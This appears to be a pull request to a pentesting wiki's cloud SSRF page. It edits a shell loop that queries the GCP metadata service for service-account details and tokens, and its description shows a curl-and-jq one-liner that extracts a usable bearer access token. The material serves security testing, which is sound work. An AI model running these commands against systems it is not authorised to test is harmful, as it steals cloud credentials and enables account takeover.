### PR TITLE
Remove cruft from the token

### DIFF
--- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -222,7 +222,7 @@ for sa in $(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/co
     echo "  Aliases: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/aliases")
     echo "  Identity: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/identity")
     echo "  Scopes: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/scopes")
-    echo "  Token: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token")
+    echo "  Token: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token|jq -r ."access_token"")
     echo "  ==============  "
 done
 # K8s Attributtes

--- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -222,7 +222,7 @@ for sa in $(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/co
     echo "  Aliases: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/aliases")
     echo "  Identity: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/identity")
     echo "  Scopes: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/scopes")
-    echo "  Token: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token|jq -r ."access_token"")
+    echo "  Token: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token"|jq -r ."access_token")
     echo "  ==============  "
 done
 # K8s Attributtes


### PR DESCRIPTION
If you just curl the token it has a format like:

```json
{
  "access_token": "ya29.XXXXXXXXXX",
  "expires_in": 2553,
  "token_type": "Bearer"
}
```

But you only need the token value (`ya29.XXXXXXXXXX`) to authenticate. Using jq you strip it to only what you need:

```
curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"|jq -r ."access_token"
ya29.XXXXXXXXXX
```